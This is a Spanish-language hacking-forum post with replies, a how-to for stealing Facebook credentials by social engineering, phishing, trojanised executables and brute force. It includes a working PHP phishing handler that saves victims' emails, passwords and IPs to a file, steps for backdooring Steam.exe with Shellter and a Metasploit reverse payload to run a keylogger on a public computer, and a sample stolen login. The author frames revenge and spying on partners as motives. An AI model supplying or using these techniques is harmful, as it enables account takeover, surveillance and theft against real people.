Hackeando cuentas de Facebook - Mi metodología

Hackeando cuentas de Facebook - Mi metodología





Saludos hermano de underc0de, estuve un poco desaparecido por motivos de estudio por eso no pude redactar ningún POST para la comunidad : ( , pero como ya tengo horas libres estaré bien constante publicando, enseñando & aprendiendo nuevos métodos con ayuda de ustedes.

En esta oportunidad vamos a tocar un tema que ha muchos "Niños Ratas" les va gustar, que es el Arte de hackear cuentas de facebook por diferentes métodos o para nosotros que somos mas refinados el arte de robar credenciales de facebook xD

Métodos:

    Ingeniería Social
    Phishing
    POST Explotacion
    Backdoors
    Keyloggers
    Brute Force


Sin duda Facebook es el principal dominio de mensajería a nivel mundial utilizado por todas las clases sociales, la compañía creada por Mark Zuckerberg  ha alcanzado el agüe durante sus principios y hasta el día de hoy sigue siendo tendencia gracias a sus adaptaciones que satisfacen las necesidades de sus usuarios.



Este es el punto en donde un "Atacante" o un "Niño Rata" entra en acción, quien de nosotros en sus principios no ha querido entrar a una cuenta de Facebook de una persona que nos cae mal y cambiarle la contraseña¿? o en la mayoría de usuarios desean obtener la contraseña de sus novios(a) para ver si los están engañando

Ingeniería Social


La ingeniería social es un método que se basa desde los principios del hombre, la cual ha sido crucial  para victorias grandes en las batallas y guerras, un claro ejemplo es Helena de Troya.

Quien no ha escuchado la historia del mítico caballo de Troya en su infancia , ya sea por vídeos animados , libros, etc,
La historia se basa prácticamente en la reina Helena, este personaje es hija de un dios que en vida encarna una gran belleza pero a la vez tendría una gran maldición  que traería consecuencias muy graves y trágicas para ella , en su momento el origen de la guerra de Troya  fue una de las guerras épica de toda la historia de la humanidad, a la vez trata de una historia de amor de París y Helena, sin embargo la guerra comenzó cuando "París" secuestra a la princesa por acto de amor, y ahí juega el rol importante de personas muy conocidos en la historia , como reyes y guerreros .
La guerra se basa entre dos civilizaciones la griegas por el rey Agamenon y la troyana por el rey Priamo.

El rey Agamenon enterado de que helena fue secuestrada , manda  una flota de 1000 barcos del mar egeo en busca de helena los griegos buscaron por mas de 10 años pero no consiguieron nada , el guerrero mas privilegiado en su momento de Grecia fue Akiles  que combatió con Hector otro guerrero privilegiado de Troya en una pelea épica entre ambos guerreros, Hector sin embargo murió en la pelea  , pero las murallas de troya sigue en pie, ahí  fue cuando los Griegos construyeron un caballo de madera sobre ruedas gigante en la cual se escondieron los soltados Griegos y recurrieron al engaño , los soldados troyanos pensaron que era un regalo y metieron el caballo a la cuidad ese mismo día  mientras que los troyanos dormían los soldados griegos posteriormente aprovecharon para salir del caballo y atacar a los griegos  de la manera mas estratégica , troya cae pero su leyenda seguirá por todos los siglos.

Narre una pequeña historia , para que vean como hasta en una guerra se pudo utilizar la ingeniería social y afectar los papeles de la misma, solo jugando con la confianza de la victima.
En la informática la ingeniería social juega con rol muy importante para conseguir datos de nuestra victima por medio  de técnicas de infiltración de datos por directorios sensibles o base de datos, para luego obtener datos de la victima que nos permita tener una comunicación con ella, para luego obtener datos físicos y posteriormente para nuestro beneficio malicioso

"El método consiste en engañar a la victima mediante la "Palabra o el acto"

En nuestro escenario la Ing. social debe jugar un rol importante acompañado de algunos métodos, entre ellos el conocido "Phishing"



El Phishing consiste en crear una pagina web falsa(Clonada), que tenga la misma caracterizara que una pagina oficial en este caso "Facebook", luego enviarla a nuestra victima, para que añada sus credenciales y obtener los datos del usuario.

Ejemplo:

Victima  - Maria
Atacante - Browser

Maria es Fans de Justin bieber, le gusta la musica POP y le encanta ver videos coreanos.

Yo, lo primero que haré sera estudiar detalladamente a mi victima, lo que haría seria ganándome su confianza poco a poco, comenzando con el "Hola" y así consecutivamente hablando de lo que mas le gusta. Hasta llegar al punto necesario de tener nuestro "Phishing" subido a un servidor y decirle lo siguiente:

Maria he encontrado un grupo privado de facebook de Justin bieber, donde regalan todo tipo de discos originales y que también tenemos "Videocamp" con nuestro ídolo.

¿Deseas que te envié el link?

¿Díganme quien joven o señorita rechazaría tal comentario? 


1- El dominio que deben crear debe ser algo parecido así No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¿porque?
Para que la victima no sospeche que sea una web falsa o algo, pero como que parece ligar verdad.

La cual pueden comprarla en cualquier HOSTING.



2- La victima seguramente nos dirá,

"Pero me sale facebook de nuevo que hago entro con mi cuenta?"

En mi caso le diré "Si", porque es un grupo secreto y no cualquiera entra ahí, y si quieres le mandas un Screenshot de un grupo de facebook original, editas la fuente y todo eso para que sea mas creíble.

La victima ya creído todo nuestro "Cuento" Añadirá sus credenciales.



El punto es el siguiente "Nosotros debemos añadir una redireccion a un grupo de facebook que hemos escogido ejemplo a un grupo de Fans" para que sea 100% creíble y no sospeche nada

<?php

$habbo = $_POST['email']; 
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR']; 
$f = fopen("Dark.html", "a"); 
fwrite ($f, 'Email: [<b><font color="#0000FF">'.$habbo.'</font></b>] Password: [<b><font color="#FF0040">'.$password.'</font></b>] IP: [<b><font color="#FE2EF7">'.$ip.'</font></b>]<br>');
fclose($f);

header("Location: https://www.facebook.com/groups/616258998512511/?ref=br_rs");
?>

Siguiendo con el tema, una ves obtenido las credenciales la tendremos en un archivo llamado "Dark.html" si la subiríamos a un servidor web seria así.



Pero como estoy utilizando en este ejemplo Social Engineer Toolkit nos saldría así

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



¿Bastante sencillo verdad?

Entonces vamos a  pasar al segundo método "POST Explotacion", consiste en enviar un archivo infectado(Payload) a nuestra victima, el payload la cual tiene como función Explotar el sistema en su totalidad para controlarlo remotamente mediante conexiones "Reversas".

En este escenario le daremos paso a "Metasploit Framework"



Les dejare unos POST'S donde les enseñare a como utilizar Metasploit Framework :

• No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
• No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
• No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Comencemos mi victima en este caso es un "Dotero" que le tengo cólera, y este tipo entra en cabinas publicas especialmente en la numero "8", o pueden utilizar el método de engañar a esa persona como lo hicimos por el Pishing para infectarlo con este método que les enseñare.

Como es una cabina publica cualquier "Persona" puede pagar y adquirir el servicio, entonces lo primero que haré sera es copiar el archivo "Steam.exe"
y compilarlo con una herramienta llamada "Shellter" para añadirle un Payload de conexión reversa entre mi ordenador con  MI IP Publica y mi Puerto de escucha,(Configurando el Router) para poder hacer ataques LAN, y conectarnos al sistema de la victima.

En mi caso lo haré locamente.



POST shellter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Maquina de la victima:



Como vemos el archivo supuesta mente esta esta en esa "Cabina Publica", lo que hacen siempre los Kit Rats es abrir el Steam, pero cuando el ejecute no cargara el Steam, si no que tendremos automáticamente controlado el sistema "Backdorizado".



Ya tenemos todo listo para el proceso de utilizar el método "Keyloggers"



Ya activado el grabador de teclados "Keyloggers", nuestra victima entrara a facebook normalmente.



Pero en otro plano nosotros tendremos las credenciales de usuario:



entonces interpretando las grabaciones del teclado , Datos del Usuario:

Ctrl+Alt+Q = @

User:[email protected]
Pass:mamasita12345

Como vemos no hay complejidad para realizar un la metodología de Ing social basado con la imaginación, siempre y cuando estemos respaldados por una herramienta que nos permita lo siguiente.

Como siempre el ultimo recurso para obtener la contraseña de un objetivo es el conocido
"Brute Force" - que consiste en un ataque con contraseñas que se ejecutaran automáticamente en una herramienta privada que fue liberada el año pasado.

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

( Lo subí en mega, porque al añadirlo en source, bloquea el POST, por la excesiva cantidad de caracteres de la herramienta : ( )



Ustedes seguramente dirán, pero Facebook te bloquea al pedir peticiones añadiendo la confirmación del "Captcha", pues para la suerte de ustedes "NO" por el simple hecho que la herramienta esta basada en las conexiones por "Headers", las cuales funcionan directamente con la colectividad de los "form"



La idea fundamental del Brute Force o Fuerza bruta es la complejidad del diccionario que tengan.
Una ves que hallamos obtenido la contraseña "Les llegara un mensaje a a victima" como este, pero como es source open pueden editar las lineas de los envíos de cabeceras del USER-AGENT les dejo una lista de sqlmap: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Una buena idea para ejecutarlo sin  dejar rastros en el momento preciso es hacerlo en horas de la madrugada o en las horas que la victima NO este, Saludos!

Happy Hacking!!!!!!!!!!!!!!!!!! : )

No sabia si comentar o no, se ve que le has echado muchas ganas a este paper.
Espero ver mas aportes tuyos en la comunidad, pero sobre algun tema menos lammer. de igual forma Felicitaciones por el esfuerzo! Esta bastante entendible.

Saludos!
ANTRAX

:O, jajajaja Antrax me sorprende, no te preocupes hermano por nada dije para los "NIÑOS RATAS", Saludos y éxitos 

Hola,

Esta muy bien, gracias por compartir, sigue asi

Aunque sea un poco "Lammer" es algo sencillito de ver y entender.

Tambien pienso que si uno sabe hacer este tipo de acciones, luego quizas es mas dificil caer en ellas.

De hecho que si, el post es una metologia,  pero "lammer"  viene a la personas que se creerán dioses luego de practicar lo relacionado al POSTS, por eso dije para los "NIÑOS RATAS"  :p

Si bien ANTRAX tiene razon, no viene mal alegrarle el dia a los niños ratas que tanto buscan sobre el tema jaja, por lo demás buen aporte bro!.

Saludos!, EPSILON.

ajajajajaja ya veo a mas de uno llevando a cabo como un loro (repetir, sin entender) los pasos que dicta el post, y cuando acabe tendrá el ego por las nubes auto-proclamándose Hackers de Anonymous xDD. Muchas gracias por el aporte hermano , como dice zorinder, luego de ver esta metodología, aprendemos a no caer tan fácil en ellas, y en mi caso a volverme cada vez mas paranoico xD

Justo para noobs como yo ( ^_^ )/

La gente hackea facebooks??  buehh

salu2

el brute force script me funsiono la primera ves y despues nada.passa el password? alguna solusion para esto?podra ser los headers de mi kali linux?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

<?php

$habbo = $_POST['email']; 
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR']; 
$f = fopen("Dark.html", "a"); 
fwrite ($f, 'Email: [<b><font color="#0000FF">'.$habbo.'</font></b>] Password: [<b><font color="#FF0040">'.$password.'</font></b>] IP: [<b><font color="#FE2EF7">'.$ip.'</font></b>]<br>');
fclose($f);

header("Location: https://www.facebook.com/groups/616258998512511/?ref=br_rs");
?>

muuuuy mal, con esto el violao puede ser otro...

jaja me mato la respuesta de ANtrax jajajaa.. de todos modos, en la guerra a veces todo se vale verdad?. Pero bueno si hablamos de etica es otra cosa. Un abrazo pa todos.

Me gustó tu aporte, hubieron algunas cosas que los lammers tendrían que resolver pero creo que esa era la intención,

les mando un saludo.

Uhmmm todas las anteriores aplicadas y excepto Brute Force, no sabia que se podía hacer eso a esa red social tan grande, ¿algún manual? claro está con fines de aprendizaje.

Saludos,
!Duda

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Uhmmm todas las anteriores aplicadas y excepto Brute Force, no sabia que se podía hacer eso a esa red social tan grande, ¿algún manual? claro está con fines de aprendizaje.

Saludos,
!Duda

En realidad excepto el ataque de brute force son todos orientados a un ataque personal, la red social no puede hacer nada si tu abres un keylogger.
Tutoriales sobre esto hay mucho, usa el buscador del foro y verás.

Saludos.